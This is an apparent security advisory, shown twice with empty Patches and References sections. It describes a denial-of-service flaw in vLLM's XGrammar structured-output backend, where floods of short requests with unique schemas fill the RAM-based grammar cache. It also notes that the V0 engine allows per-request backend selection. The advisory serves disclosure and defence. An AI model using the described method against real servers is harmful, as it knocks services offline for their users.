Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend
key of the extra_body
field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
Patches
Workarounds
There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
References
Impact
This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3
The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.
A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.
Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the
guided_decoding_backend
key of theextra_body
field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.Patches
Workarounds
There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.
References
References